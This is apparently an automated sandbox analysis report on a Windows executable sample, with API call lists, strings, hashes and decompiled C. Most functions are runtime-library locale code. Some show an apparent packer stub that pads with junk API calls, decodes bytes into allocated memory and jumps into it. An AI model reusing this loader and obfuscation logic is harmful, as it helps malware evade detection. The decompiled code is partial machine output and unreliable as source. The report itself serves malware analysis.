0x0041bdf3
0x0041bdfe
0x0041be09
0x0041be27
0x0041be32
0x0041be3d
0x0041be6e
0x0041be79
0x0041be84
0x0041bea2
0x0041bead
0x0041beb8
0x0041bec3
0x0041bee1
0x0041beec
0x0041bef7
0x0041bf22
0x0041bf2d
0x0041bf38
0x0041bf43
0x0041bf4e
0x0041bf59
0x0041bf77
0x0041bf82
0x0041bf8d
0x0041bfd1
0x0041bfdc
0x0041bfe7
0x0041bff2
0x0041c010
0x0041c01b
0x0041c026
0x0041c03e
0x0041c049
0x0041c054
0x0041c05f
0x0041c06a
0x0041c075
0x0041c093
0x0041c09e
0x0041c0a9
0x0041c0b4
0x0041c0bf
0x0041c0ca
0x0041c0e8
0x0041c106
0x0041c137
0x0041c142
0x0041c160
0x0041c191
0x0041c19c
0x0041c1a7
0x0041c1b2
0x0041c1bd
0x0041c1ee
0x0041c20c
0x0041c217
0x0041c235
0x0041c253
0x0041c25e
0x0041c269
0x0041c274
0x0041c27f
0x0041c28a
0x0041c295
0x0041c2d9
0x0041c2e4
0x0041c2ef
0x0041c30d
0x0041c32b
0x0041c336
0x0041c341
0x0041c34c
0x0041c357
0x0041c375
0x0041c380
0x0041c3c4
0x0041c3cf
0x0041c3da
0x0041c3e5
0x0041c3f0
0x0041c3fb
0x0041c406
0x0041c424
0x0041c468
0x0041c470
0x0041c47b
0x0041c499
0x0041c4a4
0x0041c4af
0x0041c4da
0x0041c4e5
0x0041c4f0
0x0041c50e
0x0041c519
0x0041c54a
0x0041c555
0x0041c573
0x0041c57e
0x0041c589
0x0041c594
0x0041c59f
0x0041c5bd
0x0041c5d5
0x0041c5dd
0x0041c5e8
0x0041c5f3
0x0041c5fe
0x0041c609
0x0041c614
0x0041c61c
0x0041c627
0x0041c645
0x0041c663
0x0041c66e
0x0041c679
0x0041c697
0x0041c6b5
0x0041c6c0
0x0041c6cb
0x0041c6d6
0x0041c6e1
0x0041c6ec
0x0041c6f7
0x0041c702
0x0041c70d
0x0041c718
0x0041c723
0x0041c741
0x0041c74c
0x0041c757
0x0041c75e
0x0041c76c
0x0041c775
0x0041c77c
0x0041c785
0x0041c78c
0x0041c795
0x0041c79c
0x0041c7b6
0x0041c7c1
0x0041c7ca

APIs

GetProcAddress.KERNEL32(?,5BC4A701), ref: 0041C7A3
VirtualProtect.KERNELBASE(00000040,?,?,5BC4A701,?,7D372D81,3DAEE9E8,?,?,74BE053A,?,74BE053A,1F2A008D,?,?,?), ref: 0041C7C1

Strings

H/P, xrefs: 0041C0F3
>e] , xrefs: 0041BD5C
k/^, xrefs: 0041BC62
|~, xrefs: 0041BB35
y]n6, xrefs: 0041BC6D
[(, xrefs: 0041C0DA
VirtualProtect, xrefs: 0041B6A4, 0041B6A9, 0041C765
PV, xrefs: 0041BB61
T, xrefs: 0041BF4E
Ig, xrefs: 0041BE09

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProcProtectVirtual
String ID: PV$>e] $Ig$T$VirtualProtect$[($k/^$y]n6$H/P$|~
API String ID: 3759838892-575480758
Opcode ID: 4f6fa25151d6172c82c0b31634384200615553ec69d12654b3a7d8f8af9e0cce
Instruction ID: 7908d69f64fd69bbd873ef0ab9665cfac054163a51af5609cc4b98bbd37a4f13
Opcode Fuzzy Hash: 4f6fa25151d6172c82c0b31634384200615553ec69d12654b3a7d8f8af9e0cce
Instruction Fuzzy Hash: 8842DCB56093818BD3B58F1AC5897CEF7E4BF96314F448A0CE6C94A611DB318A84CF4B

Uniqueness

Uniqueness Score: -1.00%

Function 00428A80, Relevance: 10.8, APIs: 7, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00428A80(void* __ebx, int __edx, void* __edi, int _a4, int _a8) {
				signed int _v8;
				signed int _v12;
				signed char* _v16;
				signed int _v20;
				signed int _v24;
				char _v38;
				struct _cpinfo _v44;
				signed char* _v48;
				void* __esi;
				signed int _t143;
				int _t146;
				signed int _t150;
				intOrPtr _t158;
				void* _t189;
				void* _t253;
				signed int _t255;
				void* _t256;
				void* _t257;

				_t253 = __edi;
				_t222 = __edx;
				_t189 = __ebx;
				_t143 =  *0x447b80; // 0x5c71e752
				_v24 = _t143 ^ _t255;
				_t146 = E00428970(_a4);
				_t257 = _t256 + 4;
				_a4 = _t146;
				if(_a4 != 0) {
					_v12 = 0;
					while(_v12 < 5) {
						_t146 = _v12 * 0x30;
						_t11 = _t146 + 0x448268; // 0x21827982
						if( *_t11 != _a4) {
							_t222 = _v12 + 1;
							_v12 = _v12 + 1;
							continue;
						} else {
							_v20 = 0;
							while(_v20 < 0x101) {
								 *((char*)(_a8 + _v20 + 0x1c)) = 0;
								_v20 = _v20 + 1;
							}
							_v8 = 0;
							while(_v8 < 4) {
								_t27 = _v8 * 8; // 0x44827d
								_v16 = _v12 * 0x30 + _t27 + 0x448278;
								while(( *_v16 & 0x000000ff) != 0) {
									_t34 =  &(_v16[1]); // 0x458908c4
									if(( *_t34 & 0x000000ff) != 0) {
										_v20 =  *_v16 & 0x000000ff;
										while(1) {
											_t40 =  &(_v16[1]); // 0x458908c4
											if(_v20 > ( *_t40 & 0x000000ff)) {
												break;
											}
											_t43 = _v8 + 0x448264; // 0x3a4
											 *(_a8 + _v20 + 0x1d) =  *(_a8 + _v20 + 0x1d) & 0x000000ff |  *_t43;
											_v20 = _v20 + 1;
										}
										_v16 =  &(_v16[2]);
										continue;
									}
									break;
								}
								_v8 = _v8 + 1;
							}
							 *(_a8 + 4) = _a4;
							 *((intOrPtr*)(_a8 + 8)) = 1;
							_t56 = _a8 + 4; // 0x7d83d845
							 *((intOrPtr*)(_a8 + 0xc)) = E00428DD0(_a8,  *_t56);
							_v8 = 0;
							while(_v8 < 6) {
								_t68 = _v8 * 2; // 0x0
								 *((short*)(_a8 + 0x10 + _v8 * 2)) =  *((intOrPtr*)(_v12 * 0x30 + _t68 + 0x44826c));
								_t222 = _v8 + 1;
								_v8 = _v8 + 1;
							}
							E00428F30(_t189, _t253, _t254, _a8);
							_t147 = 0;
						}
						goto L63;
					}
					if(_a4 == 0 || _a4 == 0xfde8 || _a4 == 0xfde9) {
						L33:
						_t147 = _t146 | 0xffffffff;
					} else {
						_t222 = _a4 & 0x0000ffff;
						_t146 = IsValidCodePage(_a4 & 0x0000ffff);
						if(_t146 != 0) {
							_t192 = _a4;
							_t150 = GetCPInfo(_a4,  &_v44);
							if(_t150 == 0) {
								if( *0x4c51f0 == 0) {
									_t147 = _t150 | 0xffffffff;
								} else {
									E00428E50(_t192, _a8);
									_t147 = 0;
								}
							} else {
								_v20 = 0;
								while(_v20 < 0x101) {
									 *((char*)(_a8 + _v20 + 0x1c)) = 0;
									_v20 = _v20 + 1;
								}
								 *(_a8 + 4) = _a4;
								 *((intOrPtr*)(_a8 + 0xc)) = 0;
								if(_v44 <= 1) {
									 *((intOrPtr*)(_a8 + 8)) = 0;
								} else {
									_v48 =  &_v38;
									while(( *_v48 & 0x000000ff) != 0 && (_v48[1] & 0x000000ff) != 0) {
										_v20 =  *_v48 & 0x000000ff;
										while(_v20 <= (_v48[1] & 0x000000ff)) {
											 *(_a8 + _v20 + 0x1d) =  *(_a8 + _v20 + 0x1d) & 0x000000ff | 0x00000004;
											_v20 = _v20 + 1;
										}
										_v48 =  &(_v48[2]);
									}
									_v20 = 1;
									while(_v20 < 0xff) {
										 *(_a8 + _v20 + 0x1d) =  *(_a8 + _v20 + 0x1d) & 0x000000ff | 0x00000008;
										_v20 = _v20 + 1;
									}
									_t124 = _a8 + 4; // 0x7d83d845
									_t158 = E00428DD0(_a8,  *_t124);
									_t257 = _t257 + 4;
									 *((intOrPtr*)(_a8 + 0xc)) = _t158;
									 *((intOrPtr*)(_a8 + 8)) = 1;
								}
								_v8 = 0;
								while(_v8 < 6) {
									 *((short*)(_a8 + 0x10 + _v8 * 2)) = 0;
									_v8 = _v8 + 1;
								}
								_t222 = _a8;
								E00428F30(_t189, _t253, _t254, _a8); // executed
								_t147 = 0;
							}
						} else {
							goto L33;
						}
					}
				} else {
					E00428E50(_a8, _a8);
					_t147 = 0;
				}
				L63:
				return E00424E60(_t147, _t189, _v24 ^ _t255, _t222, _t253, _t254);
			}

0x00428a80
0x00428a80
0x00428a80
0x00428a88
0x00428a8f
0x00428a97
0x00428a9c
0x00428a9f
0x00428aa6
0x00428abb
0x00428acd
0x00428ada
0x00428add
0x00428ae6
0x00428ac7
0x00428aca
0x00000000
0x00428aec
0x00428aec
0x00428afe
0x00428b0d
0x00428afb
0x00428afb
0x00428b13
0x00428b25
0x00428b34
0x00428b3b
0x00428b49
0x00428b56
0x00428b5c
0x00428b64
0x00428b72
0x00428b75
0x00428b7c
0x00000000
0x00000000
0x00428b81
0x00428b9a
0x00428b6f
0x00428b6f
0x00428b46
0x00000000
0x00428b46
0x00000000
0x00428b5c
0x00428b22
0x00428b22
0x00428bac
0x00428bb2
0x00428bbc
0x00428bcb
0x00428bce
0x00428be0
0x00428bf5
0x00428bfd
0x00428bda
0x00428bdd
0x00428bdd
0x00428c08
0x00428c10
0x00428c10
0x00000000
0x00428ae6
0x00428c20
0x00428c43
0x00428c43
0x00428c34
0x00428c34
0x00428c39
0x00428c41
0x00428c4f
0x00428c53
0x00428c5b
0x00428da1
0x00428db3
0x00428da3
0x00428da7
0x00428daf
0x00428daf
0x00428c61
0x00428c61
0x00428c73
0x00428c82
0x00428c70
0x00428c70
0x00428c8e
0x00428c94
0x00428c9f
0x00428d5c
0x00428ca5
0x00428ca8
0x00428cb6
0x00428cd1
0x00428cdf
0x00428cfe
0x00428cdc
0x00428cdc
0x00428cb3
0x00428cb3
0x00428d05
0x00428d17
0x00428d33
0x00428d14
0x00428d14
0x00428d3b
0x00428d3f
0x00428d44
0x00428d4a
0x00428d50
0x00428d50
0x00428d63
0x00428d75
0x00428d83
0x00428d72
0x00428d72
0x00428d8a
0x00428d8e
0x00428d96
0x00428d96
0x00000000
0x00000000
0x00000000
0x00428c41
0x00428aa8
0x00428aac
0x00428ab4
0x00428ab4
0x00428db7
0x00428dc4

APIs

getSystemCP.LIBCMTD ref: 00428A97

Part of subcall function 00428970: GetOEMCP.KERNEL32(00000000,5C71E752,0043D898,000000FF,?,00428728,?), ref: 004289CB
Part of subcall function 00428970: _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004289DE

setSBCS.LIBCMTD ref: 00428AAC
setSBUpLow.LIBCMTD ref: 00428C08

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$SystemUpdateUpdate::~_
String ID:
API String ID: 2101441384-0
Opcode ID: 71c6edb7b7dbdc6fcd40482adbb47a44a7e9b81184d16e4295222005f5b9eb3e
Instruction ID: 748b2d056386fadf5520d98e7413638778817c004681c7aac730a4b66eb53725
Opcode Fuzzy Hash: 71c6edb7b7dbdc6fcd40482adbb47a44a7e9b81184d16e4295222005f5b9eb3e
Instruction Fuzzy Hash: 47B17B74A06129DFCB04CF54E480AAEBBB1FF84304F64C55EE8166B381CB78EA45DB59

Uniqueness

Uniqueness Score: -1.00%

Function 008462FF, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Module32First.KERNEL32(00000000,00000224), ref: 00846347

Memory Dump Source

Source File: 00000000.00000002.674902927.0000000000841000.00000040.00000001.sdmp, Offset: 00841000, based on PE: false

Similarity

API ID: FirstModule32
String ID:
API String ID: 3757679902-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 7601e18a1c82858bf4d1a7dcdc1b18d2b89b48f34a2d31f17e32d65c46977b01
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 93F06232100719ABD7202FB9A88DB6EB6ECFF4A725F500529F656D25C0EA70EC454662

Uniqueness

Uniqueness Score: -1.00%

Function 00429920, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,?,00423C4B,?,?,00429A90), ref: 00429927

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: bb136fd040217f8798add158b9755d8db9bff0022e5fd5ea5e9cccf720db289d
Instruction ID: d6dc1332508921867b698eb3db106d6ee4396bde797856995e144efd0eebbed2
Opcode Fuzzy Hash: bb136fd040217f8798add158b9755d8db9bff0022e5fd5ea5e9cccf720db289d
Instruction Fuzzy Hash: 7AA0123104424863C10022826909B413A0CC3C0722F000050F21C51051096154004055

Uniqueness

Uniqueness Score: -1.00%

Function 00423DB0, Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t3;

				E0042C6F0(); // executed
				return L00423DD0(_t3);
			}

0x00423db5
0x00423dc0

APIs

___security_init_cookie.LIBCMTD ref: 00423DB5

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: ___security_init_cookie
String ID:
API String ID: 3657697845-0
Opcode ID: 24bc06dd6f8e756449fb71d37d1b4406b7b4604180a7d70f7a7b007183019b3b
Instruction ID: 9b4a21d36a4bf8b1da826f16f895972e3eae37b70c8849a0ab5fa6e128a221db
Opcode Fuzzy Hash: 24bc06dd6f8e756449fb71d37d1b4406b7b4604180a7d70f7a7b007183019b3b
Instruction Fuzzy Hash: EAA0021231466C1601603BA7244791E755D48D0719FD5101A7519521031C9CB94144EE

Uniqueness

Uniqueness Score: -1.00%

Function 00845FBE, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0084600F

Memory Dump Source

Source File: 00000000.00000002.674902927.0000000000841000.00000040.00000001.sdmp, Offset: 00841000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 9e984feb7b5c8d38f9884d0a8d20c4ab066695e3a805598daa74fefc26563d92
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: E6113C79A00208EFDB01DF98C985E99BBF5EF08350F058094F948AB362E775EA50DF81

Uniqueness

Uniqueness Score: -1.00%

Function 0041C7CB, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000000), ref: 0041C7D3

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 5dac4c181a8b91f49373ee077643744372a70756b3532214ba7852f98fc3ac1b
Instruction ID: 8a38b18e99fcb78ddaeeea41ace9156d5aef93128b750c9b5573ddf13e293b5b
Opcode Fuzzy Hash: 5dac4c181a8b91f49373ee077643744372a70756b3532214ba7852f98fc3ac1b
Instruction Fuzzy Hash: FBB012704013008FCF800F70AF04F043E20BB45312F090032F104581B1C7700040DB0C

Uniqueness

Uniqueness Score: -1.00%

Function 0041C7CC, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041C7CC(void* __eax) {
				void* _t3;

				_t3 = GlobalAlloc(0, ??); // executed
				 *0x4c14a4 = _t3;
				return _t3;
			}

0x0041c7d3
0x0041c7d9
0x0041c7de

APIs

GlobalAlloc.KERNELBASE(00000000), ref: 0041C7D3

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: ffeee5768fdc7a183a0cf1320a5309fa79a8e1f9a6f7a77a1be7c97ea0df46dd
Instruction ID: ed101ee5e06e18c116e5c0340ed88a485d90e3050d5dd6743cee823005a8753b
Opcode Fuzzy Hash: ffeee5768fdc7a183a0cf1320a5309fa79a8e1f9a6f7a77a1be7c97ea0df46dd
Instruction Fuzzy Hash: 2FB012744013004EC7800B209A04B053910AB41312F094037A004A41B1C7300040850C

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0041C7DF, Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 118
memorypipeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0041C7DF() {
				signed int _v8;
				char _v2140;
				char _v2144;
				union _ULARGE_INTEGER _v2156;
				char _v3180;
				short _v5228;
				struct _COORD _v5232;
				struct _STARTUPINFOA _v5308;
				union _ULARGE_INTEGER _v5316;
				char _v5860;
				union _ULARGE_INTEGER _v5868;
				signed int _v5872;
				signed int _v5876;

				E00420E00(0x1b1c);
				_v8 = _v8 & 0x00000000;
				while(_v8 < 0x332beaf6) {
					GetTickCount();
					if( *0x4c4ea4 == 0x16) {
						__imp__FreeUserPhysicalPages(0, 0, 0);
						__imp__GetCalendarInfoW(0, 0, 0,  &_v2140, 0,  &_v2144);
						GetProfileStringA(0, 0, 0, 0, 0);
					}
					SetLastError(0);
					if( *0x4c4ea4 == 0x9e) {
						__imp__GetSystemWow64DirectoryA( &_v3180, 0);
						GetWindowsDirectoryW( &_v5228, 0);
						__imp__GetCPInfoExW(0, 0,  &_v5860);
						GetDiskFreeSpaceExW(L"poxetijutebiligeziyehoroyofenalisibematuwejugonuyis",  &_v5316,  &_v5868,  &_v2156);
						GetStartupInfoA( &_v5308);
						ReadConsoleOutputCharacterA(0, 0, 0, _v5232, 0);
					}
					if(_v8 <= 0x3775ee) {
						_v8 = _v8 + 1;
						continue;
					} else {
						break;
					}
				}
				_t30 = L0041A9D8( *0x4c14a4,  *0x4c4ea4, 0x440000);
				_v5872 = _v5872 & 0x00000000;
				while(_v5872 < 0x3e79e) {
					if( *0x4c4ea4 == 0x10) {
						_t30 = CreateNamedPipeW(L"jawidedesasojebehorurozuhutovosuhitokoranep", 0, 0, 0, 0, 0, 0, 0);
					}
					if(_v5872 == 0x1e673) {
						L0041ABA8(_t30);
					}
					_t30 = _v5872 + 1;
					_v5872 = _v5872 + 1;
				}
				_v5876 = _v5876 & 0x00000000;
				while(_v5876 < 0xdd9a7) {
					if( *0x4c4ea4 == 0xc01) {
						GetProcessHeap();
						GetProcessHeap();
						GetPrivateProfileIntW(0, 0, 0, 0);
						SetFileAttributesA("yuvohiberirosiyucida", 0);
					}
					_v5876 = _v5876 + 1;
				}
				goto ( *0x4c14a4);
			}

0x0041c7e7
0x0041c7ec
0x0041c7f9
0x0041c806
0x0041c813
0x0041c81b
0x0041c837
0x0041c847
0x0041c847
0x0041c84f
0x0041c85f
0x0041c86a
0x0041c879
0x0041c88a
0x0041c8aa
0x0041c8b7
0x0041c8cb
0x0041c8cb
0x0041c8d8
0x0041c7f6
0x00000000
0x0041c8da
0x00000000
0x0041c8da
0x0041c8d8
0x0041c8f2
0x0041c8f7
0x0041c90d
0x0041c920
0x0041c935
0x0041c935
0x0041c945
0x0041c947
0x0041c947
0x0041c906
0x0041c907
0x0041c907
0x0041c94e
0x0041c964
0x0041c97a
0x0041c97c
0x0041c982
0x0041c990
0x0041c99d
0x0041c99d
0x0041c95e
0x0041c95e
0x0041c9a5

APIs

GetTickCount.KERNEL32 ref: 0041C806
FreeUserPhysicalPages.KERNEL32(00000000,00000000,00000000), ref: 0041C81B
GetCalendarInfoW.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 0041C837
GetProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041C847
SetLastError.KERNEL32(00000000), ref: 0041C84F
GetSystemWow64DirectoryA.KERNEL32(?,00000000), ref: 0041C86A
GetWindowsDirectoryW.KERNEL32(?,00000000), ref: 0041C879
GetCPInfoExW.KERNEL32(00000000,00000000,?), ref: 0041C88A
GetDiskFreeSpaceExW.KERNEL32(poxetijutebiligeziyehoroyofenalisibematuwejugonuyis,?,?,?), ref: 0041C8AA
GetStartupInfoA.KERNEL32(?), ref: 0041C8B7
ReadConsoleOutputCharacterA.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C8CB
CreateNamedPipeW.KERNEL32(jawidedesasojebehorurozuhutovosuhitokoranep,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041C935
GetProcessHeap.KERNEL32 ref: 0041C97C
GetProcessHeap.KERNEL32 ref: 0041C982
GetPrivateProfileIntW.KERNEL32 ref: 0041C990
SetFileAttributesA.KERNEL32(yuvohiberirosiyucida,00000000), ref: 0041C99D

Strings

jawidedesasojebehorurozuhutovosuhitokoranep, xrefs: 0041C930
u7, xrefs: 0041C8D1
yuvohiberirosiyucida, xrefs: 0041C998
poxetijutebiligeziyehoroyofenalisibematuwejugonuyis, xrefs: 0041C8A5

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: Info$DirectoryFreeHeapProcessProfile$AttributesCalendarCharacterConsoleCountCreateDiskErrorFileLastNamedOutputPagesPhysicalPipePrivateReadSpaceStartupStringSystemTickUserWindowsWow64
String ID: jawidedesasojebehorurozuhutovosuhitokoranep$poxetijutebiligeziyehoroyofenalisibematuwejugonuyis$yuvohiberirosiyucida$u7
API String ID: 2697139290-156988916
Opcode ID: e37dd77d1a6acb28a78d0d1571e34d309a3f71c9c52fc421d09b77b8f6fd8457
Instruction ID: 03af8ca2e534268f39fe828cf3d4220575e637dab7d6e21a28e4faa08ec75af3
Opcode Fuzzy Hash: e37dd77d1a6acb28a78d0d1571e34d309a3f71c9c52fc421d09b77b8f6fd8457
Instruction Fuzzy Hash: B8415074980258EFEB209B90DE89FD877B9BB04706F1041A6F249A54E1C7B859C4CF1A

Uniqueness

Uniqueness Score: -1.00%

Function 0041AA72, Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 110
timefilesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E0041AA72(union _FINDEX_INFO_LEVELS _a4) {
				void* _v8;
				void* _v22;
				char _v24;
				void* _v38;
				char _v40;
				void* _v56;
				struct _COMMTIMEOUTS _v60;
				struct _DCB _v88;
				struct _OSVERSIONINFOEXA _v244;
				char _v416;
				struct _OSVERSIONINFOEXW _v700;
				char _v1724;
				void _v2748;
				union _FINDEX_INFO_LEVELS _t29;
				void* _t57;

				if( *0x4c4ea4 == 0x37) {
					_v60.ReadIntervalTimeout = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					BuildCommDCBAndTimeoutsA("wexeta",  &_v88,  &_v60);
					GetNamedPipeHandleStateA(0, 0, 0, 0, 0, 0, 0);
					ReleaseMutex(0);
					AddAtomA("Hodohobo jogitav vehovip");
					_v40 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					_v24 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					__imp__TzSpecificLocalTimeToSystemTime( &_v416,  &_v40,  &_v24, _t57);
					SetConsoleCursorInfo(0, 0);
					VerifyVersionInfoW( &_v700, 0, 0);
					TlsGetValue(0);
					CopyFileA(0, 0, 0);
					__imp__GetLongPathNameA("hirevocerukudewikefixezilocicepa",  &_v1724, 0, 0);
					__imp__SetVolumeMountPointW(0, 0);
					GetProcessPriorityBoost(0, 0);
					FreeEnvironmentStringsA(0);
					_push(0);
					VerifyVersionInfoA( &_v244, 0, 0);
					FindFirstFileExA("tanugiwecevewupenunikuxagigixizezej", _a4,  &_v2748, _a4, 0, 0);
				}
				_v8 = 0;
				_v8 = _v8 +  *0x4c4ea8;
				_v8 = _v8 + 0x12336;
				_t29 = _a4;
				 *((char*)( *0x4c14a4 + _t29)) =  *((intOrPtr*)(_v8 + _t29));
				return _t29;
			}

0x0041aa85
0x0041aa8e
0x0041aa94
0x0041aa95
0x0041aa96
0x0041aa97
0x0041aaa5
0x0041aab2
0x0041aab9
0x0041aac4
0x0041aacc
0x0041aad3
0x0041aad4
0x0041aad5
0x0041aad6
0x0041aada
0x0041aae1
0x0041aae2
0x0041aae3
0x0041aae4
0x0041aaf5
0x0041aafd
0x0041ab0d
0x0041ab14
0x0041ab1d
0x0041ab30
0x0041ab38
0x0041ab40
0x0041ab47
0x0041ab4d
0x0041ab57
0x0041ab71
0x0041ab77
0x0041ab78
0x0041ab80
0x0041ab88
0x0041ab8b
0x0041ab9a
0x0041ab9f

APIs

BuildCommDCBAndTimeoutsA.KERNEL32 ref: 0041AAA5
GetNamedPipeHandleStateA.KERNEL32 ref: 0041AAB2
ReleaseMutex.KERNEL32(00000000), ref: 0041AAB9
AddAtomA.KERNEL32 ref: 0041AAC4
TzSpecificLocalTimeToSystemTime.KERNEL32(?,?,?), ref: 0041AAF5
SetConsoleCursorInfo.KERNEL32(00000000,00000000), ref: 0041AAFD
VerifyVersionInfoW.KERNEL32 ref: 0041AB0D
TlsGetValue.KERNEL32(00000000), ref: 0041AB14
CopyFileA.KERNEL32 ref: 0041AB1D
GetLongPathNameA.KERNEL32(hirevocerukudewikefixezilocicepa,?,00000000), ref: 0041AB30
SetVolumeMountPointW.KERNEL32(00000000,00000000), ref: 0041AB38
GetProcessPriorityBoost.KERNEL32(00000000,00000000), ref: 0041AB40
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041AB47
VerifyVersionInfoA.KERNEL32 ref: 0041AB57
FindFirstFileExA.KERNEL32(tanugiwecevewupenunikuxagigixizezej,?,?,?,00000000,00000000), ref: 0041AB71

Strings

wexeta, xrefs: 0041AAA0
tanugiwecevewupenunikuxagigixizezej, xrefs: 0041AB6C
hirevocerukudewikefixezilocicepa, xrefs: 0041AB2B
Hodohobo jogitav vehovip, xrefs: 0041AABF

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: Info$FileTimeVerifyVersion$AtomBoostBuildCommConsoleCopyCursorEnvironmentFindFirstFreeHandleLocalLongMountMutexNameNamedPathPipePointPriorityProcessReleaseSpecificStateStringsSystemTimeoutsValueVolume
String ID: Hodohobo jogitav vehovip$hirevocerukudewikefixezilocicepa$tanugiwecevewupenunikuxagigixizezej$wexeta
API String ID: 426047872-2698696957
Opcode ID: a11e9385ec0219a208d3896f7c4e8fedb776c7de2b8e1bd5b41eb08a2c85e8c1
Instruction ID: 201ef5339f3eca297c86bfdf7b66a7eab477b32249e0de4b244f4758636c4f5a
Opcode Fuzzy Hash: a11e9385ec0219a208d3896f7c4e8fedb776c7de2b8e1bd5b41eb08a2c85e8c1
Instruction Fuzzy Hash: 2A313C72802668BFD7519BE4DE48DDFBBBCEF4A350B000062F645E2430D7345A85CBAA

Uniqueness

Uniqueness Score: -1.00%

